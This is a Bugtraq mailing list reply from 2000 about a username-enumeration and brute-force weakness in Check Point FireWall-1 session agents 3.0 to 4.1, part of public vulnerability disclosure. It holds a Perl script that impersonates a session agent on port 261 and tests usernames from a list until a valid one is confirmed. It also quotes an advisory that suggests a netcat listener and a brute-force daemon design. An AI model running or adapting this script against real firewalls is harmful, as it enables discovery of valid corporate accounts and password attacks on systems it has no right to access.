Bugtraq mailing list archives
Re: Firewall-1 session agent 3.0 -> 4.1,dictionnary and brute force attack
From: Nelson Brito <nelson () SEKURE ORG>
Date: Fri, 18 Aug 2000 07:39:15 -0300
Try this code and let me know if it works...
PS: Just a question, if the user is right and password wrong, Will it
return error code?!?! =)
---brute-fw1-agent.pl
#!/usr/bin/perl -w
#
# File : brute-fw1-agent.pl
# Author: Nelson Brito<nelson () secunet com br || nelson () sekure org>
#
# Untested code, use on your own risc.
#
use Socket;
$c = 0; $port = 261; #$proto = getprotobyname('tcp');
socket(FAGENT, PF_INET, SOCK_STREAM, getprotobyname("tcp")) or die
"socket:$!";
setsockopt(FAGENT, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die
"setsockopt: $!";
bind(FAGENT, sockaddr_in($port, INADDR_ANY)) or die
"bind: $!";
listen(FAGENT, SOMAXCONN) or die
"listen: $!";
open(SDI, "users") or die "open: $!\n";
until(eof(SDI)){
$user = <SDI>; chomp($user);
next if ($user=~/^\s*#/);
next if ($user=~/^\s*$/);
push @users, $user;
}
close(SDI);
while(accept(MODULE, FAGENT)){
LINE: $c++;
print STDOUT "[+] Hii... I'm on TV $c times!\n";
recv(MODULE, $target, 1024, 0);
if($target=~/^331/i){
chomp($users[0]);
send(MODULE, "$users[0]\n", 0);
recv(MODULE, $target, 1024, 0);
if($target=~/^220/){
recv(MODULE, $target, 1024, 0);
if($target=~/^530/){
shift @users; goto LINE;
}else{
die "[-] Unknow code. What happened?\n";
}
}elsif($target=~/^331/){
print STDOUT "[+] The $users[0] username is
right!\n";
}else{
die "[-] Uknow return code. What happened?\n";
}
}else{
die "[-] Unknow return code. What happened?\n";
}
}
---brute-fw1-agent.pl
gregory duchemin wrote:
hi, every session agents from 3.0 to 4.1 (4.1 included, all plateforms ) are vulnerables to a brute force and dictionnary style password attack. while authenticating a user through his port 261, firewall modules send a "331 User:" string to the agent, wait for an answer, and then reply with a "220 User .... not found" directly followed by "530 NOTOK" if username doesn't match the user database If username exists, firewall will simply reply "331 *FireWall-1 password:" before waiting for a pass value. So the same weakness that on the old version of unix's login, we can know if a username is or isn't try #nc -l -p 261 on your workstation then connect to an outside service that need session authentication Because firewall-1 doesn't close the connection just after a mistaked username or password submission and seems to wait indefinitly for a correct entry, it should be really efficient to mount such an attack. usernames and passwords are up to 8 chars length and are usually built on some logical rules (typicaly based on first and last names for usernames and more generaly on dictionnaries words) A C or perl program with dictionnary trying permutations onto each word should be able to quickly recover many corporate accounts. This program would be a little daemon, and would have to send a spoofed request to outside before each connection, finally it should be able to accept a significant number of simultaneous connection to increase its chances of success. I don't have right now the time to make the code. Just verify your passwords are enough hard in the same way u already did it with your unix passwords. And for those who have a 4.1 firewall module, just use encryption. Have a nice day Gregory Duchemin ________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com
Sorry my poor English! Sem mais, -- Nelson Brito - http://stderr.sekure.org/ During a meditation session, Santana said, an entity called Metatron had announced: "We want to hook you back to the radio-airwave frequency."
Current thread:
- Firewall-1 session agent 3.0 -> 4.1, dictionnary and brute force attack gregory duchemin (Aug 16)
- Re: Firewall-1 session agent 3.0 -> 4.1,dictionnary and brute force attack Nelson Brito (Aug 18)